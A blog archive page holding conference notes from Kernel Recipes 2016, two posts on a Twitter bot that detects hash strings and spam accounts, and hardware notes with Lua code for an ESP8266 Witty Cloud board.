kernelci.org is another tool doing CI for kernel developers. There will be a talk about it on the next day.

There's also Mark Brown's build bot and Olof Johansson's autobuilder/autobooter.

That's it for day one of Kernel Recipes 2016 !

Man-pages: discovery, feedback loops and the perfect kernel commit message

by Michael Kerrisk; video

Presentation slides

Michael has been contributing man pages since around 2000. There around ~1400 pages.

When providing an overview, there a few challenges : providing a history of the API, the reason for the design, etc.

One of Michael's recent goals has been preventing adding new buggy Linux API. There are a few examples of this. One of the reasons is lack of prerelease testing.

There are design inconsistencies, like the different clone() versions. Behavioral inconsistencies might also creep up, like the mlock() vs remap_file_pages() differences in handling pages boundaries.

Many process change APIs have different combination of rules for matching credentials of the process that can do the changes.

Another issue is long-term maintainability, in which an API must make sure it's extensible, and work on making sure the flags are properly handled, and bad combinations are rejected.

We don't do proper API design in Michael's opinion. And when it fails, userspace can't be changed, and the kernel has to live with the problems forever.

Mitigations

In order to fix this, Unit tests are a good first step. The goal is to prevent regressions. But where should they be put ? One of the historical home of testing was the Linux Test Project. But those are out of trees, with only a partial coverage.

In 2014, the kselftest project was created, lives in-tree, and is still maintained.

A test needs a specification. It turns out specifications help telling the difference between the implementation and intent of the programmer. It's recommended to put the specification at the minimum in the commit message, and at best send a man-page patch.

Another great mitigation is to write a real application. inotify is good of example of that: it took Michael 1500 lines of code to fully understand the limitations and tricks of inotify. For example, you can't know which user/program made a given file modification. The non-recursive monitoring nature of inotify also turned out to be quite expensive for a large directory. A few other limitations were find while writing an example program.

The main point is that you need to write a real-world application if you're writing any non-trivial API in order to find its issues.

Last but not least, writing a good Documentation is a great idea: it widens the audience, allows easier understanding, etc.

Issues

A problem though is discoverability of new APIs. A good idea is to Cc the linux-api mailing list. Michael runs a script to watch for changes for example. It's an issue, because sometimes ABI changes might happen unvoluntarily, while there are a complete no-no in kernel development.

Sometimes, we get silent API changes. One example was an adjustment of the posix mq implementation that was discovered years after. By then it was too late to reverse. Of course, this API had no unit tests.

The goal to fix this is to get as much feedback as possible before the api is released to the public. You should shorten the feedback loop.

Examples

The example of recent cgroup change was given, where improvement of the commit message over the versions gave people a better understanding of the problem that was corrected. It make life easier of the reviewer, for userspace developer, etc.

The advice to the developer for a commit message is to assume the less knowledge as possible for the audience. This needs to be done at the beginning of the patch series so many people can give feedback.

The last example is from Jeff Layton's OFD locks who did a near perfect API change proposal: well explained, example programs, publicity, man-page patch, glibc patch and even going as far as proposing a POSIX standard change.

In response to a question in the audience about the state of process to introduce Linux kernel changes, Michael went as far as to propose that there be a full-time Linux Userspace API maintainer, considering the huge amount of work that needs to be done.

Real Time Linux: who needs it ? (Not you!)

by Steven Rostedt; video

What is Real Time ?

It's not about being fast. It's about determinism. It gives us repeatability, reliability, known worse case scenario and knows reaction time.

Hard Real Time is mathematically provable, and has bounded latency. The more code you have, the harder it is to prove.

With soft Real Time you can deal with outliers, but have unbounded latency.

Examples of hard real time include airplane engine controls, nuclear power plants, etc. Soft real time include a video systems, video games, and some communication systems. Linux is today a Soft Real Time system.

PREEMPT_RT in Linux

It's not a Soft Real Time system because it doesn't allow for outliers or unbounded latency. But it's not Hard Real Time either because it can't be mathematically proven. Steven says it's Hard Real Time "Designed".

If it had no bug Linux would be a Hard Real Time system. It's used by financial industries, audio recordings (jack), navigational systems.

Lots of feature from PREEMPT_RT has been integrated in the kernel. Examples include highres timers, deadline scheduler, lockdep, ftrace, mostly tickless kernel etc. It allowed people to test SMP-related bugs with only one CPU, since it changed the way spinlocks worked, giving Linux years of advance in SMP performance.

But every year PREEMPT_RT also keeps evolving and getting bigger. Missing features still in PREEMPT_RT include Spin locks to sleeping mutexes.

Latency always happens. When you have an interrupt, it might run and steal processor time to high priority thread. But with threaded interrupts, you can make sure the "top half" runs for as little time as possible, just to wake up the appropriate thread that will handle the interrupt.

Hardware matters

The hardware needs to be realtime(cache/TLB misses, etc.) as well, but this is topic of Steven's next talk. Come back tomorrow !

kernelci.org : 2 million kernel boots and counting

by Kevin Hilman; video

Kevin showed his growing collection of boards sitting in his home office, that is in fact part of kernelci.org.

Over the last years, the number of different boards supported by device trees has exploded, while board files have been slowly removed. The initial goal was therefore to test as many boards as possible, while trying to keep up with the growing number of new machines.

It started with automation of a small board farm, and then grew into kernelci.org, that builds, boots and reports on the status through web, mail or RSS.

Many trees are being tested, with many maintainers requesting that their tree being part of the project.

The goal of kernelci.org is to boot those kernel. Building is just a required step. There are currently 31 unique SoCs, across four different architectures, with 200+ unique boards.

A goal is to quickly find regressions on a wide range of hardware. Another goal is to be distributed. Anyone having a board board farm can be contributing. There are currently labs at Collabora, Pengutronix, BayLibre, etc. And all of this done in the Open, by small team, none of its member working full-time on it.

Once booted a few test suites are run, but no reporting or regression testing is done, and this is only done a small subset of platforms. The project is currently looking for help in visualization and regression detection, since the logs of these tests aren't automatically analyzed. They also would like to have more hardware dedicated to long-running tests.

They have a lot of ideas for new features that might be needed, like comparing size of kernel images, boot times, etc.

The project is also currently working on energy regressions. The project uses the ARM energy probe and BayLibre's ACME to measure power during boot, tests, etc. The goal is to detect major changes, but this is still under development. Data is being logged, but not reported or analyzed either.

How to help ? A good way to start might be just try it, and watch the platforms/boards you care about. The project is looking for contributors in tools, but also for people to automate their lab and submit the results. For the lazy, Kevin says you can just send him the hardware, as long as it's not noisy.

Kevin finally showed his schematics to plug many boards, using an ATX power supply, with usb-controled relays and huge USB hubs. The USB port usage explodes since in the ARM space, many boards need USB power supply, and then another USB port for the serial converter.

Debian's support for Secure Boot in x86 and arm

by Ben Hutchings; LWN article

Secure Boot is an optional feature in UEFI that protects against persistent malware if implemented correctly. The only common trusted certificate on PCs are for Microsoft signing keys. They will sign bootloaders on PCs for small fee, but for Windows ARM the systems are completely locked down.

For GNU/Linux, the first stage needs an MS signature. Most distribution ship "shim" as a first stage bootloader that won't need updating often.

For the kernel, you can use Matthew Garrett's patchset to add a 'securlevel' feature, activated when booted with Secure Boot, that makes module signatures mandatory, and disables kexec, hibernation and other peek/poke kernel APIs. Unfortunately this patch is not upstream.

The issue with signatures is that you don't want to expose signing keys to build daemons. You need to have reproducible builds that can't depend on anything secret, therefore you can't auto-build the signed binary in a single step. Debian's solution is to have an extra source package. The first one from which you build the unsigned binary, and a second one in which you put signatures you generated offline.

This new package is called linux-signed. It contains detached signatures for a given version, and a script to update them for a new kernel version. This is currently done on Ben's machine, and the keys aren't trusted by grub or shim.

Signing was added to the Debian archive software dak. This allows converting unsigned binaries to signed ones.

While this was already done in Ubuntu, the process is different for Debian (doesn't use Launchpad). Debian signs kernel modules, has detached signatures (as opposed to Ubuntu's signed binaries), and supports more architectures than amd64. Finally, the kernel packages from Ubuntu and Debian are very different.

Julien Cristau then came on stage to explain his work on signing with a PKCS#11 hardware security module (Yubikey for now). Signing with an HSM is slow though, so this is only done for the kernel image, not modules.

You can find more information the current status of Secure Boot on the Debian wiki. The goal is to have all of this ready for the stretch release, which freezes in January 2017.

The current state of kernel documentation

by Jonathan Corbet; video

Documentation is unsearchable, and not really organized. There is no global vision, and everything is a silo.

Formatted documentation (in source-code) is interesting because it's next to the code. It's generated with "make htmldocs", and is complex multi-step system developed by kernel developers. It parses the source files numerous times for various purposes, and is really slow. The output is ugly, and doesn't integrate with he rest of Documentation/ directory.

How to improve this ? Jon says it needs to be cleaned up, while preserving text access.

Recently, asciidoc support was added in kernel comments. It has some advantages but adds a dependency on yet-another tool.

Jon suggests that it would have been better to get rid of DocBook entirely, and rework the whole documentation build toolchain instead of adding new tools on top.

To do this, Jon had a look at Sphinx, a documentation system in Python using reStructuredText. It is designed for documenting code, generating large documents, is widely supported.

After posting a proof of concept, Jani Nikula took responsibility and pushed it into a working system. It now supports all the old comments, but also supports RST formatting. To include kerneldoc comments, Jani Nikula wrote an extension module to Sphinx.

All this work has been merged for 4.8, and there are now Sphinx documents for the kernel doc HOWTO, GPU and media subsystems.

Developers seem to be happy for now, and a new manual is coming in 4.9: Documentation/driver-api is conversion of the device drivers book. Of course, this is just the beginning, as there are lots of files to convert to the new format, and Jon estimates this might take years until it's done.

For 4.10, a goal would be to consolidate the development process docs (HOWTO, SubmittingPatches, etc.) into a document. The issue here is that some of this files are really well-known, and often pointed-to, and this would break a lot of "links" in a way.

Landlock LSM: Unprivileged sandboxing

by Mickaël Salaün; video, LWN article

The goal of landlock is to restrict processes without needing root privileges.

The use case is to be used by sandboxing managers (flatpak for example).

Landlock rules are attached to the current process via seccomp(). They can also be attached to a cgroup via bpf()

Mickaël then showed a demo of the sandboxing with a simple tool limiting the directories a given process can access.

The approach is similar to Seatbelt or OpenBSD Pledge. It's here to minimize the risk of sandbox escape and prevent privilege escalation.

Why do existing features do no fit with this model ? The four other LSMs didn't fit the needs because they are designed to be controlled by the root/admin user, while Landlock is accessible to regular users.

seccomp-BPF can't be used because it can't filter arguments that are pointers, because you can't dereference userland memory to have deep filtering of syscalls.

The goal of Landlock is to have a flexible and dynamic rule system. It of course has hard security constraints: it aims to minimize the attack surface, prevent DoS, and be able to work for multiple users by supporting independent and stackable rules.

The initial thought was to extend the seccomp() syscall, but then it was switch to eBPF. The access rules are therefore sent to the kernel with bpf().

Landlock uses LSM hooks for atomic security checks. Each rule is tied to one LSM hook. It uses map of handles, a native eBPF structure to give rules access to kernel objects. It also exposes to eBPF rules filesystem helpers that are used to handle tree access, or fs properties (mount point, inode, etc.).

Finally, bpf rules can be attached to a cgroup thanks to a patch by Daniel Mack, and Landlock uses this feature.

Rules are either enforced with the process hierarchy, with the seccomp() interface to which Landlock adds a new command; or via cgroups for container sandboxing.

The third RFC patch series for Landlock is available here.

Lightning talks

the Free Software Bastard Guide

by Clement Oudot; video

This is a nice compilation of things not to do as user, developer or enterprise. While the talk was very funny, I won't do you the offense of making a summary since I'm sure all my readers are very disciplined open source contributors.

(slides)

Mini smart router

by Willy Tarreau; video

This is about a small device made by Gl-inet. It has an Atheros SoC (AR9331) with a MIPS processor, 2 ethernet ports, wireless, 64MB of RAM and 16MB of flash.

The documentation and sources for the Aloha Pocket, a small distro running on the hardware.

Corefreq

by Cyril

Corefreq measures Intel CPUs frequencies and states. It gives you a few hardware metrics. You can lean more on Corefreq github page.

That's it for day two of Kernel Recipes 2016 !

Speeding up development by setting up a kernel build farm

by Willy Tarreau; video, LWN article

Some people might spend a lot of time building the Linux kernel, and this hurt the development cycle/feedback loop. Willy says during backporting sessions, the build time might dominate the development time. The goal here is to reduce the wait time.

In addition, build times are often impossible to predict when you might have an error in the middle breaking the build.

Potential solutions include, buying a bigger machine or using a compiler cache, but this does not fit Willy's use case.

Distributed building is the solution chosen here. But as a first step, this required a distributed workload, which isn't trivial at all for most project. Fortunately, the Linux kernel fits this model.

You need to have multiple machines, with the exact same compiler everywhere. Willy's proposed solution is to build the toolchain yourself, with crosstool-ng. You then combine this with distcc, which is a distributed build controller, with low overhead.

Distcc still does the preprocessing and linking steps locally, which will consume approx 20% to 30% of the build time. And you need to disable gcov profiling.

In order to measure efficiency of a build farm, you need to compare performance. This requires a few steps to make sure the metric is consistent, as it might depend on number of files, CPU count, etc. Counting lines of code after preprocessing might be a good idea to have a per-line metric.

Hardware

In order to select suitable machines, you first need to consider what you want to optimize for. Is it build performance at given budget, number of nodes, or power consumption ?

Then, you need to wonder what impacts performance. CPU architecture, DRAM latency, cache sizes and storage access time are all important to consider.

For the purpose of measuring performance, Willy invented a metric he calls "BogoLocs". He found that dram latency and L3 cache are more important for performance than CPU frequency.

To optimize for performance, you must make sure your controller isn't the bottleneck: its CPU or network access shouldn't be saturated for instance.

PC-type machines are by far the fastest, with their huge cache and multiple memory channels. However, they can be expensive. A good idea might be to look at gamer-designed hardware, that provides the best cost-to-performance ratio.

If you're optimizing for a low number of nodes, buy a single dual-socket high-frequency, x86 machine with all RAM slots populated.

If you're optimizing for hardware costs, a single 4-core computers can cost $8 (NanoPi). But there are a few issues: there are hidden costs (accessories, network, etc.), it might be throttled when heating, some machines are unstable because of overclocking, while only achieving up to 1/16th performance of a $800 PC.

You can also look at mid-range hardware (NanoPI-M3, Odroid C2), up to quad-core Cortex A9 at 2GHz. But then they run their own kernel. "High-range" low cost hardware are often sold as "set-top-boxes" (MiQi, RKM-v5, etc.) Some of these can even achieve 1/4th performance of a $800 PC. But there are gotchas as well, with varying build quality, high power draw, thermal throttling.

The MiQi board at $35 is Willy's main choice according to his performance measurements (or its CS-008 clone). It's an HDMI dongle that can be opened and used barebones. You don't need to use a big linux distribution, a simple chroot is enough for gcc and distcc.

All the data from this presentation is on a wiki.

Understanding a real-time system: more than just a kernel

by Steven Rostedt; video

Real-time is hard. Having preempt-rt patched kernel, is far from enough. You need to look at the hardware under, and the software on top of it, and in general have holistic view of your system.

A balance between a Real-Time system versus a "Real-Fast" system needs to be found.

You have to go with a Real-Time hardware if you want a real-time system. It's the foundation, and if you don't have it, you can forget about your goal.

Non-real-time hardware features

Memory cache impacts determinism. One should find the worst-case scenario, by trying to run without the cache.

Branch prediction misses can severely impact determinism as well.

NUMA, used on multi-CPUs hardware, can cause issues whenever a task tries to access memory from a remote node. So the goal is to make sure a real-time task always uses local memory.

Hyper-Threading on Intel processors (or AMD's similar tech) is recommended to be disabled for Real-Time.

Translation Lookaside Buffer is a cache for page tables. But this means that any miss would kill determinism. Looking for the worst-case scenario during testing by constantly flushing the TLB is needed for a real-time system.

Transactional Memory allows for parallel action in the same critical section, so it makes things pretty fast, but makes the worst case scenario hard to find when a transaction fails.

System Management Interrupt (SMI), puts the processor in System Management Mode. On a customer box, Steven was able to find that every 14minutes, an interrupt was eating CPU time, that was in fact an SMI for ECC memory.

CPU Frequency scaling needs to be disabled (idle polling), while not environmental friendly, it's a necessity for determinism.

Non-real-time software features

When you're using threaded interrupts, you need to be careful about priority, especially if you're waiting for important interrupts, like network if you're waiting for data.

Softirqs need to be looked at carefully. They are treated differently in PREEMPT_RT kernels, since they are run in the context of who raises them. Except when they are raised by real Hard interrupts like RCU or timers.

System Management Threads like RCU, watchdog or kworker also need to be taken into account, since they might be called as side-effect of a syscall required by the real-time application.

Timers are non-evident as well and might be triggered with signals, that have weird posix requirements, making the system complex, also impacting determinism.

CPU Isolation, whether used with the isolcpus kernel command line parameter, or with cgroup cpusets can help determinism if configured properly.

NO_HZ is good for power management thanks to longer sleeps, but might kill latency since coming out of sleep can take a long time, leading to missed deadlines.

NO_HZ_FULL might be able to help with real-time once ready, since it can keep the kernel from bothering real-time tasks by removing the last 1-second tick.

When writing an RT Task, memory locking with mlockall() is necessary to prevent page fault from interrupting your threads. Enabling priority inheritance is a good idea to prevent some types of locking situations leading to unbounded latency.

Linux Driver Model

by Greg Kroah-Hartman; video

Presentation files

Greg says nobody needs to know about the driver model.

If you're doing reference counting, use struct kref, it handles lots of really tricky edge cases. You need to use your own locking though.

The base object type is struct kobject, it handles the sysfs representation. You should probably never use it, it's not meant for drivers.

On top of that struct attribute provides sysfs files for kobjects, also to never be managed individually. The goal here is to have only one text or binary value per file. It prevents a problem seen in /proc where multiple values per file broke lots of applications when values were added, or unavailable.

kobj_type handles sysfs functions, namespaces, and release().

struct device is the universal structure, that everyone sees. It either belongs to a bus or a "class".

struct device_driver handles a driver that controls a device. It does the usual probe/remove, etc.

struct bus_type binds devices and drivers, matching, handles uevents and shutdown. Writing a bus is a complex task, it requires at least 300 lines of code, and has lots of responsibilities, with little helper functions.

Creating a device is not easy either, as you should set its position in the hierarchy (bus type, parent), the attributes and initialize it in two-step way to prevent race conditions.

Registering a driver is a bit simpler (probe/release, ownership), but still complex. struct class are userspace-visible devices, very simple to create (30-40 lines of code). A class has a lot of responsibilities, but most of those are handled by default, so not every driver has to implement them.

Greg says usb is not a good example to understand the driver model, since it's complex and stretches it to its limits. The usb2serial bus is good example.

The implementation relies on multiple levels of hierarchy, and has lots of pointer indirections throughout the tree in order to find the appropriate function for an operation (like shutdown())

Driver writers should only use attribute groups, and (almost) never called sysfs_*() functions. Greg says you should never use platform_device. This interface is abused of using a real bus, or the virtual bus.

Greg repeated that raw sysfs/kobjects should never be used.

Analyzing Linux Kernel interface changes by looking at binaries

by Dodji Seketeli; LWN article

What if we could see changes in interfaces between the kernel and its modules just by looking at the ELF binaries ? It would be a kind of diff for binaries, and show changes in meaningful way.

abidiff already does almost all of this userspace binaries. It builds an internal representation of an API corpus, and can build differences. Dodji shows us here how does abidiff works.

Unfortunately, there's nothing yet for the Linux Kernel. Dodji entertains the idea of a "kabidiff" tool that would work like abidiff, but for the Linux kernel.

For this to work, it would need to handle special Linux ELF symbol sections. For instance, it would restrain itself to "__export_symbol" and "__export_symbol_gpl" sections. It would also need to support augmenting an ABI corpus with artifacts from modules.

In fact, work on this has just started in the dodji/kabidiff branch of libabigail.git.

Video color spaces

by Hans Verkuil; LWN article

struct v4l2_pix_format introduced in kernel 3.18 is the subject of the talk.

Hans started by saying that Color is an illusion, interpreted by the brain.

A colorspace is actually the definition of the type of light source, where the white point is, and how to reproduce it.

Colorspaces might be linear, but neither human vision or early cRTs were. So to convert from a linear to non-linear colorspace, you define a transfer function.

In video, we otfen use the Y'CbCr (YUV) colorspace. To convert to and from RGB is possible. You can represent all colors in all colorspaces, as long as you don't do quantization (cut of values <0 and >1), which is why you should always do it last.

There are a few standards to describe colorspaces: Rec 709, sRGB, SMPTE 170M, and lately BT 2020 used for HDTVs.

Typically, colorspace names might be confusing, the conversion matrices might be buggy, and applications would just ignore colorspace information. Sometimes, hardware uses a bad transfer function.

In the end Hans found that only half of the vl2_pix_format structure fields were useful.

Hans showed examples of the difference of transfer functions between SMPTE 170M and Rec.709. The difference between Rec. 709 and sRGB, or betweer Rec.709 and BT.601 Y'CbCr is more visible. Those example would be impossible to see on a projector, but luckily the room at Mozilla's has huge LCD screens. But even there, it's not enough, since with Full/Limited Range Quantization, a light grey color visible on Hans' screen, was simply white while displayed on the big screen and recording stream. Some piece of the video chain was just doing quantization "bad".

State of DRM graphics driver subsystem

by Daniel Vetter; LWN article

The Direct Rendering Management (drm) subsystem is slowly taking over the world.

Daniel started by saying that the new kerneldoc toolchain (see above talk by Jonathan Corbet) is really nice. Everything with regards to the new atomic modesetting is documented. Lots of docs have been added.

Some issues in the old userspace-facing API are still there. Those old DRI1 drivers can't be removed, but have been prefixed with drm_legacy_ and isolated.

The intel-gpu-tools tests have been ported to be generic, and are starting to get used by on many drivers. Some CI systems have been deployed, and documentation added.

The open userspace requirement has been documented: userspace-facing api in DRM kernel code requires an open source userspace program.

Atomic display drivers have allowed flicker-free modesetting, with check/commit semantics. It has been implemented because of hardware restrictions. It also allows userspace to know in advance if a given modification would be possible. You can then write userspace that can try approaches, without becoming too complex.

20 drivers and counting have been merged with an atomic interface, which 2 or 3 per release, as opposed to one per year (1 per 4 or 5 releases) in the 7 years before atomic modesetting. There's a huge acceleration in development, driving lots of small polish, boiler-plate removals, documentation and new helpers.

There's a bright future, with the drm api being used in android, wayland, chromeos, etc. Possible improvements include a benchmark mode, or more buffer management like android's ion.o

A generic fdbev implementation has been written on top of KMS.

Fences are like struct completion, but for DMA. Implicit fences are taken care of by the kernel. Explicit fences can be passed around by userspace. Fences allows synchronisation between components of video pipeline, like a decoder and an upscaler for example.

With upcoming explicit fencing support in kernel and mesa, you can now run Android on upstream code, with graphics support.

The downside right now is the bleak support of rendering in open drivers. There are 3 vendor-supported, 3 reverse-engineered drivers, and the rest is nowhere to be seen.

The new hwmon device registration API

by Jean Delvare

The hwmon subsystem is used for hardware sensors available in every machine, like temperature sensors for example.

hwmon has come a long way. 10 years go, it became unmaintanable, with lots of device-specific code in userspace libraries.

The lm-sensors v2 in 2004 was based on procfs for kernel 2.4, and sysfs for kernel 2.6.x.

In 2006, there was no standard procfs interface. Therefore, for lm-sensors v3, a documentation was written, standards were enforced, and the one-value per sysfs file rule was adopted. No more device-specific code in libsensors and applications was allowed. Support for new devices could finally be added without touching user-space.

kernel-space

Once the userspace interface was fixed, it did not mean the end of the road.

It turned out that every driver implemented its own UAPI. So in 2005, a new hwmon sysfs class was submitted. It was quite simple, and all drivers were converted to the new subsystem at once.

It worked for a while, but wasn't sufficient. In 2013, a new hwmon device registration API was introduced: hwmon_register_with_groups. It gives the core flexibility, and allows it to validate the device name. Later this year a new API was added to help unregister and cleanup.

Finally, in July 2016 a new registration API proposal was proposed, moving hwmon attributes in core, and doing the heavy lifting of setting up sysfs properly. This patchset is still under review and discussion. Driver conversion won't be straightforward at all, but still deletes more code.

In conclusion, a good subsystem should help drivers, integrate well into the kernel, and offer a standard interface. It should provide a smaller binary size and have fewer bugs. But there are still concerns with regards to performance issues, and added complexity because of too many registration functions.

That's it for Kernel Recipes 2016 ! Congratulations if you managed to read everything !

Making a Twitter bot that looks for hashes

2016-09-09T18:00:00+02:00

This is a followup to What do you find when you search Twitter for hashes ?

Why ?

I'm not sure I remember how it started.

It all started four years ago. Jon Oberheide was still an independent security researcher and not yet CTO of a successful product company. He posted some hashes on twitter. I was perplex at first but then I quickly understood that it was to serve as a proof in case someone disputed his research's finding later (and the timing at which he found his results). He was posting hash proofs. And then Matthew Garrett did it too.

At the time Twitter wasn't very reliable for accessing old tweets (they vastly improved). I thought maybe by finding these hash proofs and indexing them, we could serve as an independent verifier. Nowadays all the kids put their hashes in the Bitcoin blockchain, and there are even services to do it from your browser.

So how to do it ?

This ought to be easy, right? The initial idea was to just do a simple search of random characters in the hexadecimal space, and hope that they are in hashes ? Well, not really. At first I thought it could be done, but it can't, because twitter search only works on full words, since it's tokenizing for indexing purposes. Which means you can't search for part of words hoping to stumble upon hashes. So much for using n-grams.

Therefore, I had to use the public sample stream, and filter every tweet in order to find relevant ones.

Firehose ? Not likely.

Twitter has a special stream that contains all the tweets being posted, called "Firehose". Few people get access to it. There are two other streams: Gardenhose, containing 10% on the tweets, and Spritzer, the sample stream containing 1% of the tweets. The bot currently runs on Spritzer, and Gardenhose was requested, but I never got an answer. It's part of the monetization strategy. No place here for hacker/hobbyists.

So only 1% of tweets(I have tried to verify that with other public data, it seems about right despite my initial thoughts) that's why the bots haven't been talking much together yet. It also means there's a 99% chance of missing your tweet. And that development iteration speed is a hundred time slower.

How does it work ?

The initial version used a naive regex, but had too many false positives, from repeated characters, to magnet links of P2P files. Now it's much harder to match.

The regex is currently matching MD5, SHA1, SHA256 and SHA512 sizes. Most uses are covered.

I added a naive exclusion filter (all letters or all numbers), which might not detect extremely well crafted hashes a researcher might be working on. This is out of scope for hashproofs, the anti-spam measures are already pretty strong and might miss interesting content.

Current approach

The first stage is a simple regex [a-f0-9]{32,128} . I wanted it as simple as possible because it is run on every tweet, and should be as fast as possible.

The second stage is a much more complex regex (harder to match), with specific sizes of various hashes.

Then there are lots of manually crafted filters to fight off spam. Blocked keywords. Users banned automatically. Embedded images and most links are blocked.

Finally there is entropy measurement, making sure we have a hash and not a mindless series of characters.

Performance research

To improve performance, I built-in quite a few tools. For example, there's a command allowing to dump the sample stream in temporary file (that you're not allowed to keep). This file is then used to measure performance in a repeatable fashion (there's no contradiction here, right ?), and isolated from the network.

I implemented different version of the core line processing, some of which are still in the tests. I was trying to see how to speed up the code. But after some profiling, I realized that most of the time was spent in json processing. Moving to ultrajson(ujson) cut the processing time by 5, compared to python2's cjson module.

Bot detection and spam fighting algorithm

What I did was initially mostly manual: keyword based, username and client based. I kept adding new keywords and banning new clients, but it didn't scale.

I then implemented an analysis of a match users's timeline. Within the last 200 tweets, if it had more than 5% of hashes, it was probably a bot. It greatly cut the spam at first, and since it's implementation in 2013 has detected 14k+ accounts posting more that 5% of hashes, and 2.7k+ accounts posting more 50%.

There was still a LOT of things passing through (including porn). But the strategy is to use automatic (algorithmic) filtering, not manual. I had to resolve to blocking most outgoing URLs, meaning ther's nothing to spam for. I had to filter tweets containing images.

Earlier this year, I discovered a spam network selling followers used the new Twitter Cards to embed links & images without having an URL in the tweet, so I added a filter for that too. For some reason, they were posting lots of hashes. Maybe adding entropy helps circumvent Twitter's detection systems.

Challenges

The code is not py3k compatible for historical reasons (used to need requests-oauth, but moved since to requests-oauthlib (which at some point was inside requests)), although I love py3k. I also had to use ur"" strings, which were ported in python 3.3, which wasn't available at the time. The porting shouldn't be very hard.

It was very hard to deal with twitter intermittent service. I developed a watchdog specifically to detect hangs, and then auto-restart. It's the easy way out, but has allowed the bot to work quite well, with months-long uptimes between the updates.

As I said earlier, it's hard to debug with a very slow stream that make errors appear a hundred times more slowly.

Finally, this "light" stream means there's a 99% chance of missing your tweet. Unless you have lot of followers that RT you, but then you don't need hashproofs, do you ?

Potential improvements

Follow user stream and watch for hashes. The bot already auto follows people below a certain rate already for good potential feed.
use a hashtag (e.g #hashproof) that security researcher can use so that their important tweets are seen.

Gimme the code, gimme the data

Today I'm publishing the source code for hashbot on Github. The data is available there as well and analyzed in the earlier article.

Who noticed ?

I actually implemented Georg's suggestion and all hashes were entropy checked after this.

Yeah, spam was this bad (and still is to an extent).

It was also noticed by @adulau

He asked about the code. Which is why you're seeing this here today.

A few successful findings

There out to be some after all ? Here are a few:

Lessons from the project

Always test, makes for robust code.

Always benchmark, you might have surprises, cf ultrajson that gave 5x performance speed up.

A watchdog is essential when interacting with an external, long-lived service. Twitter has been stopping the stream while keeping the TCP socket open many times, which would mean a hang of the bot.

What do you find when you search Twitter for hashes ?

2016-09-09T17:00:00+02:00

This image:

This is what I found with hashbot, a twitter bot that looks for hashes.

What is this image ?

Posted with the hash "2f404a288d1b564fadee944827a39a14" by japanese accounts (of which @furueru_zekkei used to be the top poster, now suspended).

After a bit of research on google images and more, I found that this image is a photo of the White Desert in New Mexico, by Greg Riegler. This might or might not be the same Greg Riegler as here.

Why is this ?

Bots. There a lots of them. The Internet is made of bots.

This is what you were most likely to find until 2015 (with a 10% chance).

How do I know that ? Well I searched. But this is a story for another post.

What else do you find ? Bots bots bots.

Along this, I found many japanese bots mentionning @null

Porn posting bots. The internet is made of them. For some reasons they post hashes... maybe to make sure their tweets are unique and not detected as a spam network ?

Occasionnal git and mercurial commit IDs.

Security researcher posting proof-of-work. This was the initial motivation behind hashproofs.

iPhone UDIDs. Apparently there's a 'market' on Twitter between devs and users to enable iPhones with beta builds:

Giveaway of various activation codes for games, digital products.

People crowd-sourcing password hashs, and bots running rainbow table queries.

Bitcoin transaction IDs:

Torrent hashes:

Some things just impossible to understand:

LOTS of bots posting more than 5% of tweets containing hashes (found a lot) These won't appear in the results, but here is the list.

I realize how ironic it is to criticize Twitter for having a lot of bots, because the same conditions that allowed all these bots (the API), also permitted this research (as compared to a scraping bot that would have to be updated more often). Of course, hashproofs isn't really spamming, and just acts as a "curator", and does a job that would be impossible to do for a human (i.e analyzing lots of tweets/s).

The full list of results can be found on hashproofs' Twitter feed.

Give me the data

I published the code on Github and the full results of the four-year research. (WARNING: contains spam and porn links)

This should give you the full data you need to re-analyze the results or run you own hashbot instance (with a better algorithm? or access to a better stream ?)

Unveiling a few bot networks

As I explained earlier, hashproofs analyzes the timeline of users for every matching tweets. If the percentage of matching tweets they have is above a certain arbitrary level (5%), the username is banned locally. If it's over 50%, the account is blocked. That's why you'll find two different lists in the results. One is from Twitter, listing the ids of blocked account. The other is the content of the "banlist" state file of the bot.

By analyzing the list of blocked users, I found a few legitimate bots (e.g posting commits on twitter, running rainbow tables, see earlier). I also found a lot of spam bots, some of which were taken car of by twitter. I also discovered that spammers tend to rename their accounts, and my younger self only thought of tracking the usernames, not the account ids, so that's why you'll see discrepancies if you try to have the two lists match.

You'll also see that even regular users rename their account if you look at historical data from 2014.

Here are a few excerpt from the banlist that show twitter handles that I doubt have been created by legitimate users:

  3924fe95e2cd5f8
  68c59dbbb15c5a4
  6298c2a08ef9b3b
  a33262acc8e5c77
  b2dc44d67994d44
  21332a575639f58
  […]
  Cloud404aa
  cloud405aa
  cloud406aa
  cloud407aa
  […]
  000xxx_6wy
  000xxx_897
  000xxx_dr3
  […]
  Death_ldo
  Death_y7s
  Death_mew
  Death_ojy

All of those are in sequence, which means they were detected by hashproofs one after the other. There are many other examples like this if you want to look at all the 14k+ automatically banned handles.

If you're interested in the historical and technical details, read on to the following article.

Unofficial witty cloud module documentation with nodemcu firmware

2016-02-25T00:00:00+01:00

I wanted to try my hand with ESP8266 modules, so I got a witty cloud development board. It's running a proprietary firmware from gizwits which I backed up if anyone wants to look at it.

The board is in two parts: programming board("cape") with ch340g usb serial and 3.3V converter (plus flash and reset buttons); and main board with the esp module, ams1117 3.3V voltage regulator, a button, a blue led, an rgb led, and a light sensor(photo resistor). All this for the price of a nodemcu board, but in a smaller form factor.

One of the greatest things of the ESP8266 ecosystem is nodemcu-firmware, an environment allowing you to program the microcontroller in lua, greatly simplifying the prototyping and familiarization.

After backing up the flash with esptool (see esptool read_flash), I flashed the latest release of nodemcu-firmware. Then, using nodemcu-uploader, one can access the lua REPL (nodemcu-uploader terminal) and uploads lua scripts (nodemcu-uploader --baud 9600 upload init.lua); init.lua being the first script being run at powerup.

Quick doc

I reverse-engineered the various goodies that are on board, since I didn't find any documentation on this specific board online:

Blue LED: use the PWM 4. High duty cycle = OFF.

-- Use a LED with a 500Hz PWM
function led(pin, level)
    pwm.setup(pin, 500, level)
    pwm.start(pin)
end

-- Control the Blue LED: 0 -> 1023 higher means light off
function blueLed(inverted_level)
    led(4, inverted_level)
end

blueLed(10) -- test at high intensity

RGB LED: use PWMs 8, 6, 7. High duty cyle = ON.

-- Control an RGB LED: three 0->1023 values; higher means more light
function rgb(r, g, b)
    led(8, r)
    led(6, g)
    led(7, b)
end

rgb(500, 0, 0) -- test RED

Button: GPIO 2. button pressed = 0 level.

-- launch connect() on button press
gpio.mode(2, gpio.INPUT)
gpio.trig(2, "down", connect)

Light sensor: use the ADC.

-- Print light sensor value
print(adc.read(0))

Going further

